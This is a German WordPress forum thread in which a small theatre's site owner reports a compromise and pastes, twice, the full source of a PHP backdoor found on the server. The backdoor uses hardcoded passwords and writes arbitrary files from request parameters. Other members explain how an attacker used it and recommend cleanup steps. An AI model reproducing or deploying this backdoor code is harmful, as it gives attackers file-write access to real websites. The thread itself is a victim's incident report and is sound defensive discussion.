1. Herzlich willkommen bei WPDE.org, dem grössten und ältesten deutschsprachigen Community-Forum rund um das Thema WordPress. Du musst angemeldet oder registriert sein, um Beiträge verfassen zu können.
    Information ausblenden

Webseite gehackt?

Dieses Thema im Forum "Installation" wurde erstellt von textgalerist, 12. November 2015.

  1. textgalerist

    textgalerist Well-Known Member

    Registriert seit:
    9. Oktober 2008
    Beiträge:
    114
    Zustimmungen:
    0
    Eben bin ich per FTP auf die Seite gegangen und habe in de rRoot lauter leere Ordner mit cr cu usw. gefunden, einer allerdings (a2) ist mit endlos vielen Dateien gefüllt mit 0 B. Ich versuche ihn gerade herunterzuladen. Ist das sinnvoll? Einer heißt vr.php und zeigt auch asiatische Schriftzeichen. Ich bin drauf gekommen, weil ich plötzlich, selbst über FTP, keine Bilder mehr hochladen kann.

    Wir benutzen leider Wordpress 3.5

    Was soll ich machen?
     
  2. Hille

    Hille Well-Known Member

    Registriert seit:
    22. Januar 2012
    Beiträge:
    7.965
    Zustimmungen:
    9
    Kann man einfach nur sagen, Selber schuld!
    Wenn dort Verzeichnisse oder Dateien auftauchen, die nicht von euch stammen, kann man evtl. von einem gehackten Account ausgehen. Sucht euch einen Profi hier in der Jobbörse, dann seit ihr auf der sicheren Seite.
     
  3. textgalerist

    textgalerist Well-Known Member

    Registriert seit:
    9. Oktober 2008
    Beiträge:
    114
    Zustimmungen:
    0
    Super Antwort. Sehr hilfreich!
     
  4. Hille

    Hille Well-Known Member

    Registriert seit:
    22. Januar 2012
    Beiträge:
    7.965
    Zustimmungen:
    9
    Was soll ich dir anderes schreiben? Ich habe weder Zugang zu deinem Server noch weiß ich nicht, ob du das entsprechende wissen hast, Malware zu erkennen, zu beseitigen und anschließend die Sicherheitslücke zu schließen. Um ehrlich zu sein, ich glaube es nicht. Daher meine Empfehlung, sich professionelle Unterstützung in der Jobbörse zu suchen.
     
  5. textgalerist

    textgalerist Well-Known Member

    Registriert seit:
    9. Oktober 2008
    Beiträge:
    114
    Zustimmungen:
    0
    Ich habe mich da schon hingewandt, aber es antwortet keiner.
    Ich habe das Passwort zum FTP geändert.
    Ich habe nur einen Benutzer, das bin ich. Also, gibt es wohl keine Zugriffe von dort.
    Ich habe aus dem wp-content-Bereich verdächtige Dateien wie help.php, system.php und eine andere php-Datei gelöscht mit s, Name schon vergessen. 404.php, leer, auch gelöscht, dazu Unmengen Ordner mit meist leeren html-Dateien, da ist der Löschvorgang noch nicht beendet, in einer war eine Datei 9.js, .htacces hat keine Veränderung. Bei Google habe ich gelesen, dass die Seite nicht gefährlich ist. Anscheinend hat sich das gerade aufgebaut, die Dateien waren frühestens vom 2. November, auch vom 11. November.

    Ach ja, ich habe seit neuestem Sophos - und Sophos hat mir heute gemeldet, dass da Trojaner waren im theme-Bereich.

    Was soll ich noch machen? Willst du mal schauen. Ich geb dir gerne den Zugang.
     
  6. textgalerist

    textgalerist Well-Known Member

    Registriert seit:
    9. Oktober 2008
    Beiträge:
    114
    Zustimmungen:
    0
    und vr.php war ja auch noch, habe ich gelöscht, da stand Folgendes drin:

    <?php
    $action=$_REQUEST['action']; //页面状态
    $password=$_REQUEST['password'];//接口密码
    $pathname=$_REQUEST['pathname'];//文件目录名
    $keywordindex=$_REQUEST['keywordindex'];//0 然并卵
    $filename=$_REQUEST['filename'];//生成文件名
    $body=stripslashes($_REQUEST['body']);// 生成文件的内容

    $jamin = @$_GET['pw'];






    if($jamin) { if($jamin == "smy110")
    { $zm = fopen(dirname(__FILE__).'/'.$filename,"w"); fwrite($zm,$body); fclose($zm);
    if(is_file(dirname(__FILE__).'/'.$filename)){echo "yes<br>";}else{echo "no<br>";}}}


    if($action=="test")
    {
    echo 'test success';
    return;
    }


    if($action!="publish")
    {
    echo 'action error';
    return;
    }


    if($action==""||$password==""||$filename==""||$body=="")
    {
    echo 'parameters error';
    return;
    }


    if($password!="dgkrybssfhf56")
    {
    echo 'password error';
    return;
    }


    $wjj=dirname(__FILE__)."\".$pathname;
    function createFolder($path)
    {
    if (!file_exists($path))
    {
    createFolder(dirname($path));
    mkdir($path, 0777,true);
    }
    }



    if(!is_dir($wjj))
    {
    createFolder($pathname);
    }







    $fp=fopen($pathname.'/'.$filename,"w");

    fwrite($fp, $body);
    fclose($fp);


    if(is_file($pathname.'/'.$filename))
    {
    echo "publish success";
    }else
    {
    echo "File does not exist";
    }





    ?>
     
  7. textgalerist

    textgalerist Well-Known Member

    Registriert seit:
    9. Oktober 2008
    Beiträge:
    114
    Zustimmungen:
    0
    und vr.php war ja auch noch, habe ich gelöscht, da stand Folgendes drin:

    <?php
    $action=$_REQUEST['action']; //页面状态
    $password=$_REQUEST['password'];//接口密码
    $pathname=$_REQUEST['pathname'];//文件目录名
    $keywordindex=$_REQUEST['keywordindex'];//0 然并卵
    $filename=$_REQUEST['filename'];//生成文件名
    $body=stripslashes($_REQUEST['body']);// 生成文件的内容

    $jamin = @$_GET['pw'];






    if($jamin) { if($jamin == "smy110")
    { $zm = fopen(dirname(__FILE__).'/'.$filename,"w"); fwrite($zm,$body); fclose($zm);
    if(is_file(dirname(__FILE__).'/'.$filename)){echo "yes<br>";}else{echo "no<br>";}}}


    if($action=="test")
    {
    echo 'test success';
    return;
    }


    if($action!="publish")
    {
    echo 'action error';
    return;
    }


    if($action==""||$password==""||$filename==""||$body=="")
    {
    echo 'parameters error';
    return;
    }


    if($password!="dgkrybssfhf56")
    {
    echo 'password error';
    return;
    }


    $wjj=dirname(__FILE__)."".$pathname;
    function createFolder($path)
    {
    if (!file_exists($path))
    {
    createFolder(dirname($path));
    mkdir($path, 0777,true);
    }
    }



    if(!is_dir($wjj))
    {
    createFolder($pathname);
    }







    $fp=fopen($pathname.'/'.$filename,"w");

    fwrite($fp, $body);
    fclose($fp);


    if(is_file($pathname.'/'.$filename))
    {
    echo "publish success";
    }else
    {
    echo "File does not exist";
    }





    ?>
     
  8. r23

    r23 Well-Known Member

    Registriert seit:
    9. Dezember 2006
    Beiträge:
    7.361
    Zustimmungen:
    589


    Du kannst keiner Datei mehr trauen. D.h. der Angreifer hat sich selber _Scripte_ auf den Server hochgeladen und konnte diese ausführen

    http://exampe.org/dum_di_dum/vr.php?=seine_befehle.


    mit
    PHP:
    Entschuldige, aber du musst dich registrieren oder anmelden um den Inhalt sehen zu können!
    hat er zum Beispiel neue Verzeichnisse auf dem Server angelegt. wenn

    PHP:
    Entschuldige, aber du musst dich registrieren oder anmelden um den Inhalt sehen zu können!
    funktioniert hat - muss auf nicht in jeder PHP Konfiguration funktionieren, so haben die Verzeichnisse 777 rechte. d.h.

    Jeder darf in dem Verzeichnis lesen, schreiben und Programme ausführen. JEDER- weltweit... Der Angreifer benötigt dafür weder FTP Zugang noch irgendwelche Passwörter.



    1. Website vom Netz nehmen, damit kein weitere Schaden durch die Seite nimmt
    2. Die Sicherheitslücke suchen und schließen
    3. alles Löschen und eine _nicht_ verseuchte Datensicherung zurück kopieren.
    usw.
     
  9. SirEctor

    SirEctor Well-Known Member
    Ehrenmitglied

    Registriert seit:
    28. Oktober 2008
    Beiträge:
    12.361
    Zustimmungen:
    427
    Ich kann auch nur empfehlen, dass du dir am Besten jemanden suchst, der etwas davon versteht. Du weißt ja nicht einmal wie der Angreifer rein gekommen ist. Das kann jetzt immer wieder passieren, sofern die Lücke nicht gefunden ist. Und die Version 3.5 begünstigt das ganze leider nicht.

    Hast du ein sauberes Backup?
     
  10. textgalerist

    textgalerist Well-Known Member

    Registriert seit:
    9. Oktober 2008
    Beiträge:
    114
    Zustimmungen:
    0
    Danke für deine Antwort. Leider funktioniert der Link nicht.

    Wie gesagt, Google stuft die Seite als nicht gefährlich ein.

    Wir sind ein kleines Theater, das ist gerade in dieser Zeit eine Katastrophe, sie vom Netz zu nehmen, da sind unmittelbar Fördergelder mit verbunden. Gibt es irgendwelche anderen Lösungen. Bitte helft uns! Es geht da schnell um die Existenz!
     
  11. textgalerist

    textgalerist Well-Known Member

    Registriert seit:
    9. Oktober 2008
    Beiträge:
    114
    Zustimmungen:
    0
    Wie finde ich einen Profi, über die Jobbörse finde ich bisher keinen. Der Profi, der mir all die Jahre geholfen hat, ist in der Mongolei für ein großes Projekt.
     
  12. r23

    r23 Well-Known Member

    Registriert seit:
    9. Dezember 2006
    Beiträge:
    7.361
    Zustimmungen:
    589
    du hast von mir ein angebot per pn erhalten.
     
  13. textgalerist

    textgalerist Well-Known Member

    Registriert seit:
    9. Oktober 2008
    Beiträge:
    114
    Zustimmungen:
    0
    Liebe Leute,

    vielen Dank für die Antworten. Es läuft alles wieder schön, Dank der großartigen Hilfe hier aus dem Forum von KLE-Hosting.
     
  1. Diese Seite verwendet Cookies, um Inhalte zu personalisieren, diese deiner Erfahrung anzupassen und dich nach der Registrierung angemeldet zu halten.
    Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies.
    Information ausblenden
  1. Diese Seite verwendet Cookies, um Inhalte zu personalisieren, diese deiner Erfahrung anzupassen und dich nach der Registrierung angemeldet zu halten.
    Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies.
    Information ausblenden